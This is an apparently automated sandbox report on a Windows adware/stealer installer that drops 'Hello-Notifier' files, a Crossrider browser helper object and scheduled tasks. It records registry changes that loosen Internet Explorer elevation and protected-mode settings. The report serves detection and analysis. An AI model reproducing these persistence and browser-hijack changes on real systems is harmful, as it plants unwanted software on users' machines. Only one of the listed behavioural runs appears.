Malware Analysis Report

2025-03-15 04:26

Sample ID 241025-18cq6swhqm
Target 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N
SHA256 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25
Tags
adware discovery evasion persistence privilege_escalation spyware stealer upx
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25

Threat Level: Likely malicious

The file 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N was found to be: Likely malicious.

Malicious Activity Summary

adware discovery evasion persistence privilege_escalation spyware stealer upx

Checks for common network interception software

Loads dropped DLL

Reads user/profile data of web browsers

Event Triggered Execution: Component Object Model Hijacking

Executes dropped EXE

ACProtect 1.3x - 1.4x DLL software

Installs/modifies Browser Helper Object

Checks installed software on the system

UPX packed file

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

NSIS installer

System policy modification

Suspicious use of WriteProcessMemory

Modifies registry class

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 22:18

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:21

Platform

win7-20241010-en

Max time kernel

51s

Max time network

57s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"

Signatures

Checks for common network interception software

evasion

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\SysWOW64\regsvr32.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-helper.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier.ico C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\background.html C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\37928.xpi C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Installer.log C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\utils.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\Hello-Notifier-bg.exe = "8000" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{660BF2E7-F3CE-43D3-96E9-51F45E4EE215} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A71C09BB-8724-4A9B-B93E-74A8D2DCE38A} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A71C09BB-8724-4A9B-B93E-74A8D2DCE38A}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{660BF2E7-F3CE-43D3-96E9-51F45E4EE215}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{65021441-ED41-4725-8921-AF5CACAE92F6}\Policy = "3" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
